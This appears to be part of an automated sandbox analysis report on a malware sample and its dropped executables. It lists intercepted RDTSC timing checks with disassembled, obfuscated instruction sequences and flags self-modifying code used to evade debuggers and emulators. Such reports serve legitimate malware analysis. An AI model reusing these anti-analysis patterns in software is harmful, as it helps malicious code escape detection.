                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C00B9 second address: 52C00FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE311181225h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 44h 0x0000000c jmp 00007FE31118121Eh 0x00000011 xchg eax, ebx 0x00000012 jmp 00007FE311181220h 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C00FB second address: 52C00FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C00FF second address: 52C0103 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0103 second address: 52C0109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0109 second address: 52C018E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, B7h 0x00000005 movzx ecx, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FE31118121Fh 0x00000013 jmp 00007FE311181223h 0x00000018 popfd 0x00000019 mov cx, ADFFh 0x0000001d popad 0x0000001e xchg eax, esi 0x0000001f jmp 00007FE311181222h 0x00000024 push eax 0x00000025 jmp 00007FE31118121Bh 0x0000002a xchg eax, esi 0x0000002b pushad 0x0000002c mov bx, si 0x0000002f jmp 00007FE311181220h 0x00000034 popad 0x00000035 xchg eax, edi 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FE311181227h 0x0000003d rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C018E second address: 52C023F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FE310CDC3A7h 0x00000011 add ch, FFFFFF9Eh 0x00000014 jmp 00007FE310CDC3A9h 0x00000019 popfd 0x0000001a mov dl, al 0x0000001c popad 0x0000001d xchg eax, edi 0x0000001e pushad 0x0000001f mov di, 7DACh 0x00000023 movsx ebx, ax 0x00000026 popad 0x00000027 mov edi, dword ptr [ebp+08h] 0x0000002a jmp 00007FE310CDC39Ch 0x0000002f mov dword ptr [esp+24h], 00000000h 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a mov di, 87E0h 0x0000003e pushfd 0x0000003f jmp 00007FE310CDC3A9h 0x00000044 adc cx, D0E6h 0x00000049 jmp 00007FE310CDC3A1h 0x0000004e popfd 0x0000004f popad 0x00000050 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C023F second address: 52C02F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE311181221h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock bts dword ptr [edi], 00000000h 0x0000000e jmp 00007FE31118121Eh 0x00000013 jc 00007FE383BF33E2h 0x00000019 jmp 00007FE311181220h 0x0000001e pop edi 0x0000001f jmp 00007FE311181220h 0x00000024 pop esi 0x00000025 pushad 0x00000026 movzx esi, di 0x00000029 pushfd 0x0000002a jmp 00007FE311181223h 0x0000002f xor eax, 4090C6DEh 0x00000035 jmp 00007FE311181229h 0x0000003a popfd 0x0000003b popad 0x0000003c pop ebx 0x0000003d jmp 00007FE31118121Eh 0x00000042 mov esp, ebp 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007FE311181227h 0x0000004b rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C02F2 second address: 52C02F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C02F8 second address: 52C0345 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE31118121Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c pushad 0x0000000d call 00007FE311181224h 0x00000012 pushfd 0x00000013 jmp 00007FE311181222h 0x00000018 and cl, FFFFFFC8h 0x0000001b jmp 00007FE31118121Bh 0x00000020 popfd 0x00000021 pop ecx 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52B0A9F second address: 52B0AA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52B0AA5 second address: 52B0AA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52B0AA9 second address: 52B0AD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a movzx ecx, dx 0x0000000d call 00007FE310CDC3A1h 0x00000012 mov ebx, eax 0x00000014 pop eax 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52B0AD2 second address: 52B0AD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52B0AD6 second address: 52B0ADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52B0ADA second address: 52B0AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52B0AE0 second address: 52B0AE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52B0AE6 second address: 52B0AEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52B0AEA second address: 52B0B22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FE310CDC3A4h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FE310CDC3A7h 0x00000017 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52B0B22 second address: 52B0B28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52B0B28 second address: 52B0B2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52B0B2C second address: 52B0B30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52B0B30 second address: 52B0BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a call 00007FE310CDC39Ah 0x0000000f push esi 0x00000010 pop ebx 0x00000011 pop ecx 0x00000012 push edi 0x00000013 pushfd 0x00000014 jmp 00007FE310CDC39Ah 0x00000019 jmp 00007FE310CDC3A5h 0x0000001e popfd 0x0000001f pop esi 0x00000020 popad 0x00000021 mov dword ptr [esp], ebx 0x00000024 jmp 00007FE310CDC3A7h 0x00000029 xchg eax, esi 0x0000002a pushad 0x0000002b mov di, cx 0x0000002e mov edi, esi 0x00000030 popad 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FE310CDC3A8h 0x00000039 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52B0BA8 second address: 52B0BAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52B0BAE second address: 52B0BCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE310CDC3A4h 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C058A second address: 52C05AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE311181229h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C05AD second address: 52C05B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C05B3 second address: 52C05B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C05B8 second address: 52C060C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC39Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FE310CDC3A6h 0x0000000f mov ebp, esp 0x00000011 jmp 00007FE310CDC3A0h 0x00000016 push FFFFFFFEh 0x00000018 pushad 0x00000019 call 00007FE310CDC39Eh 0x0000001e mov ebx, ecx 0x00000020 pop eax 0x00000021 push eax 0x00000022 push edx 0x00000023 mov bl, FCh 0x00000025 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C060C second address: 52C0610 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0610 second address: 52C0622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push 56081D23h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0622 second address: 52C0628 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0628 second address: 52C06F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE310CDC3A5h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 21D7A2F5h 0x00000012 pushad 0x00000013 pushad 0x00000014 mov eax, edx 0x00000016 mov dx, ECA8h 0x0000001a popad 0x0000001b pushad 0x0000001c call 00007FE310CDC3A7h 0x00000021 pop ecx 0x00000022 pushfd 0x00000023 jmp 00007FE310CDC3A9h 0x00000028 xor cx, 8776h 0x0000002d jmp 00007FE310CDC3A1h 0x00000032 popfd 0x00000033 popad 0x00000034 popad 0x00000035 push 36EE5781h 0x0000003a jmp 00007FE310CDC3A7h 0x0000003f xor dword ptr [esp], 4138F981h 0x00000046 jmp 00007FE310CDC3A6h 0x0000004b mov eax, dword ptr fs:[00000000h] 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007FE310CDC3A7h 0x00000058 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C06F7 second address: 52C0721 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FE31118121Ch 0x0000000f push eax 0x00000010 jmp 00007FE31118121Bh 0x00000015 nop 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov cl, bl 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0721 second address: 52C0726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0726 second address: 52C072C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C072C second address: 52C0730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0730 second address: 52C0734 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0734 second address: 52C076D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 1Ch 0x0000000b jmp 00007FE310CDC3A1h 0x00000010 xchg eax, ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FE310CDC3A8h 0x0000001a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C076D second address: 52C077C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE31118121Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C077C second address: 52C0878 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007FE310CDC39Bh 0x0000000b sub si, B83Eh 0x00000010 jmp 00007FE310CDC3A9h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FE310CDC3A7h 0x00000021 xor ecx, 210A3A4Eh 0x00000027 jmp 00007FE310CDC3A9h 0x0000002c popfd 0x0000002d mov ax, 4657h 0x00000031 popad 0x00000032 xchg eax, ebx 0x00000033 pushad 0x00000034 call 00007FE310CDC3A8h 0x00000039 mov dx, si 0x0000003c pop eax 0x0000003d pushfd 0x0000003e jmp 00007FE310CDC3A7h 0x00000043 and esi, 125FADBEh 0x00000049 jmp 00007FE310CDC3A9h 0x0000004e popfd 0x0000004f popad 0x00000050 xchg eax, esi 0x00000051 jmp 00007FE310CDC39Eh 0x00000056 push eax 0x00000057 jmp 00007FE310CDC39Bh 0x0000005c xchg eax, esi 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007FE310CDC3A5h 0x00000064 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0878 second address: 52C08BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FE311181227h 0x00000008 pop ecx 0x00000009 movsx edx, ax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, edi 0x00000010 jmp 00007FE311181220h 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FE31118121Eh 0x0000001d rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C08BB second address: 52C0938 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 jmp 00007FE310CDC39Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, edi 0x0000000e jmp 00007FE310CDC39Eh 0x00000013 mov eax, dword ptr [77E1B370h] 0x00000018 pushad 0x00000019 call 00007FE310CDC39Eh 0x0000001e push esi 0x0000001f pop edx 0x00000020 pop eax 0x00000021 pushfd 0x00000022 jmp 00007FE310CDC3A7h 0x00000027 jmp 00007FE310CDC3A3h 0x0000002c popfd 0x0000002d popad 0x0000002e xor dword ptr [ebp-08h], eax 0x00000031 pushad 0x00000032 mov di, si 0x00000035 push ecx 0x00000036 mov cx, di 0x00000039 pop ebx 0x0000003a popad 0x0000003b xor eax, ebp 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 mov edi, ecx 0x00000042 popad 0x00000043 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0938 second address: 52C096F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE311181229h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FE31118121Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 movzx ecx, di 0x00000016 movsx ebx, cx 0x00000019 popad 0x0000001a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C096F second address: 52C0993 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC39Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE310CDC3A0h 0x00000013 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0993 second address: 52C09A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE31118121Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C09A2 second address: 52C09BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE310CDC3A4h 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C09BA second address: 52C0A48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-10h] 0x0000000b jmp 00007FE311181227h 0x00000010 mov dword ptr fs:[00000000h], eax 0x00000016 jmp 00007FE311181226h 0x0000001b mov esi, dword ptr [ebp+08h] 0x0000001e jmp 00007FE311181220h 0x00000023 mov eax, dword ptr [esi+10h] 0x00000026 pushad 0x00000027 pushad 0x00000028 call 00007FE31118121Ch 0x0000002d pop ecx 0x0000002e popad 0x0000002f jmp 00007FE31118121Eh 0x00000034 popad 0x00000035 test eax, eax 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FE311181227h 0x0000003e rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0A48 second address: 52C0A60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE310CDC3A4h 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0A60 second address: 52C0A7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE31118121Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FE383BE04C9h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0A7C second address: 52C0AAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FE310CDC3A1h 0x0000000a add si, CDF6h 0x0000000f jmp 00007FE310CDC3A1h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0AAA second address: 52C0AB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0AB0 second address: 52C0AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0AB4 second address: 52C0AB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0AB8 second address: 52C0B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, 00000000h 0x0000000d jmp 00007FE310CDC3A4h 0x00000012 mov dword ptr [ebp-20h], eax 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FE310CDC39Eh 0x0000001c sbb si, 8178h 0x00000021 jmp 00007FE310CDC39Bh 0x00000026 popfd 0x00000027 call 00007FE310CDC3A8h 0x0000002c mov edi, eax 0x0000002e pop ecx 0x0000002f popad 0x00000030 mov ebx, dword ptr [esi] 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007FE310CDC3A3h 0x00000039 adc ecx, 23D46E9Eh 0x0000003f jmp 00007FE310CDC3A9h 0x00000044 popfd 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FE310CDC39Eh 0x0000004c rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52A0445 second address: 52A0449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52A0449 second address: 52A044F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52A044F second address: 52A0466 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE311181223h 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52A0466 second address: 52A04EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov dx, si 0x00000010 pushfd 0x00000011 jmp 00007FE310CDC3A8h 0x00000016 and esi, 339D6D88h 0x0000001c jmp 00007FE310CDC39Bh 0x00000021 popfd 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007FE310CDC39Bh 0x0000002e and eax, 0CF7F1CEh 0x00000034 jmp 00007FE310CDC3A9h 0x00000039 popfd 0x0000003a mov di, cx 0x0000003d popad 0x0000003e rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRDTSC instruction interceptor: First address: 2B2E01 second address: 2B2E06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRDTSC instruction interceptor: First address: 43061A second address: 43066A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c ja 00007FE310CDC396h 0x00000012 jmp 00007FE310CDC3A1h 0x00000017 jmp 00007FE310CDC3A7h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jne 00007FE310CDC396h 0x00000025 rdtsc
                                      Tries to evade debugger and weak emulator (self modifying code)
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSpecial instruction interceptor: First address: 272E28 instructions caused by: Self-modifying code
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSpecial instruction interceptor: First address: 418EA2 instructions caused by: Self-modifying code
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSpecial instruction interceptor: First address: 445BD8 instructions caused by: Self-modifying code
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSpecial instruction interceptor: First address: 272D50 instructions caused by: Self-modifying code
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSpecial instruction interceptor: First address: 4AF6A5 instructions caused by: Self-modifying code
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSpecial instruction interceptor: First address: 418370 instructions caused by: Self-modifying code
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSpecial instruction interceptor: First address: 2B2E28 instructions caused by: Self-modifying code
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSpecial instruction interceptor: First address: 458EA2 instructions caused by: Self-modifying code
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSpecial instruction interceptor: First address: 485BD8 instructions caused by: Self-modifying code
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSpecial instruction interceptor: First address: 2B2D50 instructions caused by: Self-modifying code
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSpecial instruction interceptor: First address: 4EF6A5 instructions caused by: Self-modifying code
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSpecial instruction interceptor: First address: 458370 instructions caused by: Self-modifying code
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSpecial instruction interceptor: First address: 417E2A instructions caused by: Self-modifying code
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSpecial instruction interceptor: First address: 5B983A instructions caused by: Self-modifying code
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSpecial instruction interceptor: First address: 5E1DF8 instructions caused by: Self-modifying code
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSpecial instruction interceptor: First address: 5C9717 instructions caused by: Self-modifying code
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSpecial instruction interceptor: First address: 641C4A instructions caused by: Self-modifying code
                                      Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXESpecial instruction interceptor: First address: 1E2E28 instructions caused by: Self-modifying code
                                      Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXESpecial instruction interceptor: First address: 388EA2 instructions caused by: Self-modifying code
